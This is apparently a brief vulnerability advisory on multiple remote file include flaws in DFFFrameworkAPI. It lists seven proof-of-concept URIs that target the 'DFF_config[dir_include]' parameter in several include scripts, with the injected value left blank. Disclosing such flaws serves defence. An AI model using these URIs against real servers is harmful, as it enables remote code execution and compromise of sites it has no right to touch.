|
DFFFrameworkAPI 'DFF_config[dir_include]' Parameter Multiple Remote File Include Vulnerabilities
An attacker can exploit these issues via a browser. The following proof-of-concept URIs are available: http://www.example.com/DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]= http://www.example.com/DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]= http://www.example.com/DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]= http://www.example.com/DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]= http://www.example.com/DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]= http://www.example.com/DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]= http://www.example.com/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]= |
|
|
Privacy Statement |
